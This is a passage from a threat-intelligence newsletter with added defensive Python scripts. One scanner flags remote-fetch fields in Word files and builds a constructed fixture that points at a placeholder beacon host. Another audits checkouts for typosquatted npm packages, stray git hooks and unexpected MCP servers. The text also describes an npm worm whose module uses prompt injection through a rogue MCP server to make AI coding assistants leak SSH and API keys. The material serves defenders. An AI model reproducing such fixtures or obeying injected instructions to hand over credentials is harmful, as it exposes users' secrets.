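# Added example, not code from the report on Operation MacroMaze: a static
# triage check for .docx files that flags remote INCLUDEPICTURE fields, external
# image relationships and an embedded VBA project. The fixture written by
# build_sample_docx() is constructed; its beacon host (.invalid) is a placeholder.

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
FIELD_RE = re.compile(r'INCLUDEPICTURE\s+"?([^"\s]+)', re.IGNORECASE)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
HIGH_INTEREST_HOSTS = {"webhook.site"}  # named in the report; extend from your own telemetry


def field_codes(xml_bytes):
    """Collect field instructions: simple fields keep the code in an attribute,
    complex fields split it across instrText runs, so those are joined in order."""
    root = ET.fromstring(xml_bytes)
    codes = [el.get(f"{{{W_NS}}}instr", "") for el in root.iter(f"{{{W_NS}}}fldSimple")]
    codes.append("".join(el.text or "" for el in root.iter(f"{{{W_NS}}}instrText")))
    return codes


def _finding(kind, part, target):
    host = urlparse(target).hostname if target else None
    return {"kind": kind, "part": part, "target": target,
            "severity": "high" if host in HIGH_INTEREST_HOSTS else "medium"}


def scan_docx(path):
    """Return findings for one .docx. Any remote target deserves a look, because
    Word fetches it when the document is opened (the delivery beacon above)."""
    findings = []
    with zipfile.ZipFile(path) as z:
        names = set(z.namelist())
        for name in sorted(names):
            if name.startswith("word/") and name.endswith(".xml"):
                for code in field_codes(z.read(name)):
                    for m in FIELD_RE.finditer(code):
                        if REMOTE_RE.match(m.group(1)):
                            findings.append(_finding("remote-includepicture", name, m.group(1)))
            elif name.startswith("word/") and name.endswith(".rels"):
                for rel in ET.fromstring(z.read(name)).iter(f"{{{R_NS}}}Relationship"):
                    tgt = rel.get("Target", "")
                    if rel.get("TargetMode") == "External" and REMOTE_RE.match(tgt):
                        findings.append(_finding("external-relationship", name, tgt))
        if "word/vbaProject.bin" in names:
            findings.append(_finding("vba-project", "word/vbaProject.bin", ""))
    return findings


def build_sample_docx(path, beacon="https://beacon.example.invalid/x"):
    """Write a minimal constructed .docx: one simple field, one complex field split
    across two runs, one external image relationship, and a stub vbaProject.bin."""
    document = (
        f'<w:document xmlns:w="{W_NS}"><w:body>'
        f'<w:p><w:fldSimple w:instr=" INCLUDEPICTURE &quot;{beacon}/simple&quot; \\d ">'
        '<w:r><w:t>[img]</w:t></w:r></w:fldSimple></w:p>'
        '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDE</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">PICTURE "{beacon}/complex" \\d</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
        '<w:p><w:r><w:t>Agenda</w:t></w:r></w:p></w:body></w:document>')
    rels = (f'<Relationships xmlns="{R_NS}"><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
            f'Target="{beacon}/rel.png" TargetMode="External"/></Relationships>')
    types = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
             '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
             '<Default Extension="xml" ContentType="application/xml"/></Types>')
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("word/vbaProject.bin", b"stub, not a real VBA project")


def demo():
    """Write the constructed fixture to a temporary file and scan it."""
    with tempfile.TemporaryDirectory() as d:
        p = f"{d}/agenda.docx"
        build_sample_docx(p)
        return scan_docx(p)


if __name__ == "__main__":
    for f in demo():
        print(f["severity"], f["kind"], f["part"], f["target"])
```

Run it over mail-gateway attachments or a quarantine share; a remote INCLUDEPICTURE inside an agenda from a government sender is an unusual enough combination to justify the EDR pivot on Office child processes suggested above, and the same parts (headers, footers, their .rels) are covered because the loop walks every XML part under word/.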
<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/10001">T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9615">T1204.002 - User Execution: Malicious File</a> | <a href="https://ui.threatstream.com/attackpattern/9853">T1059.005 - Command and Scripting Interpreter: Visual Basic</a> | <a href="https://ui.threatstream.com/attackpattern/10029">T1059.003 - Command and Scripting Interpreter: Windows Command Shell</a> | <a href="https://ui.threatstream.com/attackpattern/49479">T1674 - Input Injection</a> | <a href="https://ui.threatstream.com/attackpattern/9931">T1053.005 - Scheduled Task/Job: Scheduled Task</a> | <a href="https://ui.threatstream.com/attackpattern/30598">T1027.010 - Obfuscated Files or Information: Command Obfuscation</a> | <a href="https://ui.threatstream.com/attackpattern/9779">T1564.003 - Hide Artifacts: Hidden Window</a> | <a href="https://ui.threatstream.com/attackpattern/9770">T1070.004 - Indicator Removal on Host: File Deletion</a> | <a href="https://ui.threatstream.com/attackpattern/32040">T1656 - Impersonation</a> | <a href="https://ui.threatstream.com/attackpattern/9723">T1102.002 - Web Service: Bidirectional Communication</a> | <a href="https://ui.threatstream.com/attackpattern/32051">T1567.004 - Exfiltration Over Web Service: Exfiltration Over Webhook</a><br> <b>Target Industry:</b> Government<br> <b>Source Country:</b> Russian Federation<br> <b>Source Region:</b> Europe<br> </p> <h2 id="article-1"><a href="https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html" target="_blank" rel="noopener noreferrer">Malicious npm Packages Harvest Crypto Keys, CI Secrets, and API Tokens </a></h2> <p>(published: February 23, 2026)</p> <p> Researchers identified at least 19 malicious npm packages conducting a two-stage supply chain attack designated SANDWORM_MODE, published under the aliases official334 and javaorg. 
The packages spread through typosquatting, impersonating popular developer utilities to increase the likelihood of accidental installation. On import, the first stage immediately harvests cryptocurrency keys, npm and GitHub tokens, and environment secrets, exfiltrating the most financially valuable data before any evasion logic applies. A second, more destructive stage is encrypted within the first and deliberately delayed by 48 to 96 hours to evade sandbox analysis, though it fires immediately in CI environments. When it activates, it performs deep credential harvesting from password managers and local storage, spreads by injecting malicious dependencies into the victim's own repositories and republishing infected packages under their npm identity, and plants persistent git hooks that carry the infection into every future repository the developer creates. A separate module targets AI coding assistants including Claude Code and Cursor, deploying a rogue server that uses prompt injection to silently collect SSH keys, cloud credentials, and API keys for nine LLM providers without the user's knowledge. A linked GitHub Action ties the npm and CI infection chains together into a self-reinforcing loop. A polymorphic evasion engine and a destructive routine capable of wiping the user's home directory are both present but currently disabled, suggesting the operator is still iterating on the tooling. npm has removed the packages and GitHub has dismantled the associated infrastructure.<br> <br><b>Analyst Comment:</b> SANDWORM_MODE shares significant tradecraft with previously reported Shai-Hulud-style npm worms, though whether this represents a direct continuation or a separate actor adopting the same playbook is unconfirmed. The most critical detail for defenders is that cryptocurrency keys are exfiltrated immediately on install, before the delayed second stage activates and before most detection tooling would flag anything unusual. 
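Three of the artefacts this report describes are cheap to audit on a developer workstation or CI runner: dependency names that are near misses of well-known packages, git hooks that should not be there, and MCP server entries in AI coding-assistant configuration. The script below is an added example and not the researchers' or npm's tooling; the allowlist of known package names is constructed, and the config locations it reads (.mcp.json for Claude Code, .cursor/mcp.json for Cursor) are assumptions about those tools' project-level layout.

```python
"""Audit a checkout for the SANDWORM_MODE-style artefacts described above.
Added example; the sample repository it builds is constructed for the demo."""
import json
import tempfile
from pathlib import Path

# Constructed allowlist: names a typosquat would be expected to imitate.
KNOWN_PACKAGES = {"lodash", "express", "axios", "chalk", "commander", "dotenv"}
# Assumed project-level MCP config locations for Claude Code and Cursor.
MCP_CONFIG_PATHS = (".mcp.json", ".cursor/mcp.json")


def edit_distance(a, b):
    """Levenshtein distance; package names are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(package_json, max_dist=2):
    """Dependencies within max_dist edits of a known name, excluding exact matches."""
    deps = {**package_json.get("dependencies", {}), **package_json.get("devDependencies", {})}
    hits = []
    for name in deps:
        bare = name.split("/")[-1]          # strip a scope such as @org/
        for known in KNOWN_PACKAGES:
            if bare != known and edit_distance(bare, known) <= max_dist:
                hits.append((name, known))
    return sorted(hits)


def active_git_hooks(repo):
    """Hook files git would actually execute (anything not ending in .sample)."""
    hooks = repo / ".git" / "hooks"
    if not hooks.is_dir():
        return []
    return sorted(p.name for p in hooks.iterdir()
                  if p.is_file() and not p.name.endswith(".sample"))


def mcp_servers(repo, allowlist=frozenset()):
    """(config file, server name, launch spec) for each server not on the allowlist."""
    found = []
    for rel in MCP_CONFIG_PATHS:
        cfg = repo / rel
        if not cfg.is_file():
            continue
        for name, spec in json.loads(cfg.read_text()).get("mcpServers", {}).items():
            if name not in allowlist:
                launch = spec.get("url") or " ".join([spec.get("command", "")] + spec.get("args", []))
                found.append((rel, name, launch))
    return found


def audit(repo, mcp_allowlist=frozenset()):
    pkg_file = repo / "package.json"
    pkg = json.loads(pkg_file.read_text()) if pkg_file.is_file() else {}
    return {
        "typosquats": typosquat_candidates(pkg),
        "git_hooks": active_git_hooks(repo),
        "mcp_servers": mcp_servers(repo, mcp_allowlist),
    }


def build_sample_repo():
    """Constructed repo: one near-miss dependency, one live hook, one MCP server."""
    repo = Path(tempfile.mkdtemp())
    (repo / "package.json").write_text(json.dumps(
        {"dependencies": {"expres": "^4.0.0", "lodash": "^4.17.21"}}))
    hooks = repo / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "pre-commit.sample").write_text("# shipped by git, never executed\n")
    (hooks / "post-checkout").write_text("#!/bin/sh\n# constructed: hook nobody added on purpose\n")
    (repo / ".cursor").mkdir()
    (repo / ".cursor" / "mcp.json").write_text(json.dumps(
        {"mcpServers": {"helper": {"command": "node", "args": ["helper.js"]}}}))
    return repo


if __name__ == "__main__":
    print(json.dumps(audit(build_sample_repo()), indent=2))
```

Run it from the root of each checkout; anything it reports is a review item, not proof of compromise, since legitimate near-miss names and hand-written hooks exist. Pass the names of sanctioned MCP servers as the allowlist so only unexpected entries surface.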
The 48 to 96 hour delay is deliberate, designed to outlast sandbox analysis windows, and the worm subsequently spreads using the victim's own trusted credentials, meaning downstream infections may appear to originate from a legitimate internal source. The targeting of AI coding assistants is a notable development that likely reflects their rapid adoption in developer workflows; Model Context Protocol (MCP) server configurations are not yet a standard part of most organizations' credential attack surface monitoring and should be included in incident response scoping. The presence of disabled capabilities, including a polymorphic engine and a destructive wiper, combined with researcher assessment that this is likely a pre-release build, suggests further iterations are probable and may be considerably harder to detect.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/9610">T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools</a> | <a href="https://ui.threatstream.com/attackpattern/9611">T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain</a> | <a href="https://ui.threatstream.com/attackpattern/10112">T1059.007 - Command and Scripting Interpreter: JavaScript</a> | <a href="https://ui.threatstream.com/attackpattern/9970">T1546.004 - Event Triggered Execution: Unix Shell Configuration Modification</a> | <a href="https://ui.threatstream.com/attackpattern/10114">T1176 - Browser Extensions</a> | <a href="https://ui.threatstream.com/attackpattern/9591">T1027 - Obfuscated Files or Information</a> | <a href="https://ui.threatstream.com/attackpattern/10081">T1036.005 - Masquerading: Match Legitimate Name or Location</a> | <a href="https://ui.threatstream.com/attackpattern/10000">T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion</a> | <a href="https://ui.threatstream.com/attackpattern/10014">T1552.001 - Unsecured Credentials: Credentials In Files</a> | <a href="https://ui.threatstream.com/attackpattern/9771">T1552.004 - Unsecured Credentials: Private Keys</a> | <a href="https://ui.threatstream.com/attackpattern/10033">T1555.005 - Credentials from Password Stores: Password Managers</a> | <a href="https://ui.threatstream.com/attackpattern/9794">T1119 - Automated Collection</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a> | <a href="https://ui.threatstream.com/attackpattern/9747">T1567.001 - Exfiltration Over Web Service: Exfiltration To Code Repository</a> | <a href="https://ui.threatstream.com/attackpattern/9742">T1048 - Exfiltration Over Alternative Protocol</a> | <a href="https://ui.threatstream.com/attackpattern/9870">T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9891">T1071.004 - Application Layer Protocol: DNS</a><br> </p> <h2 id="article-1"><a href="https://www.infosecurity-magazine.com/news/immediate-patch-cisco-catalyst/" target="_blank" rel="noopener noreferrer">Global Cyber Agencies Urge Immediate Patching of Cisco Catalyst SD-WAN Zero-Day </a></h2> <p>(published: February 26, 2026)</p> <p> Government cybersecurity agencies from the US, UK, Canada, Australia, and New Zealand have issued urgent guidance requiring immediate patching of two vulnerabilities in Cisco Catalyst SD-WAN Controller and Cisco Catalyst SD-WAN Manager. The critical zero-day, CVE-2026-20127, is an authentication bypass flaw (classified as CWE-287) in the peering authentication mechanism, carrying the maximum Common Vulnerability Scoring System (CVSS) score of 10.0. An unauthenticated remote attacker can exploit it by sending crafted requests to gain access as a high-privileged internal non-root account, access NETCONF, and manipulate SD-WAN fabric configuration. No workaround is available, though Cisco documents temporary mitigations including firewall and access control list restrictions on ports 22 and 830. The vulnerability affects on-premises, Cisco-hosted cloud, and FedRAMP deployment types. According to the Five Eyes joint Threat Hunt guide, sophisticated threat actors have exploited this flaw since 2023 and likely downgraded target systems to exploit the legacy local privilege escalation vulnerability CVE-2022-20775 before restoring the original software version to achieve root access. Limited active exploitation has been confirmed. The Australian Signals Directorate's Australian Cyber Security Centre reported the vulnerability to Cisco. Defenders should audit /var/log/auth.log for unauthorized vmanage-admin public key authentication events. <br> <br><b>Analyst Comment:</b> Organisations running Cisco Catalyst SD-WAN should treat this as a potential incident response situation rather than a routine patch cycle. The likely attack chain, involving a deliberate software downgrade to exploit CVE-2022-20775 followed by a version restore, is a technique that may obscure post-compromise activity. 
An affected system may appear fully patched and operationally normal while a threat actor retains persistent root-level access. Patching CVE-2026-20127 alone does not remediate an existing compromise. Defenders should complete threat hunting using the Five Eyes Hunt Guide before or alongside patching, with particular attention to unauthorised peering events and unexpected vmanage-admin authentication entries in auth.log. The rogue peer technique documented by the National Cyber Security Centre (NCSC) indicates actors are pursuing long-term persistent access to network fabric rather than short-duration intrusion. Analysis suggests this may indicate strategic intelligence collection or pre-positioning objectives, though this assessment is not confirmed by current sources. Organisations outside the US federal government are not bound by the CISA emergency directive but should treat the guidance as directly applicable.<br> </p> </div>
</div>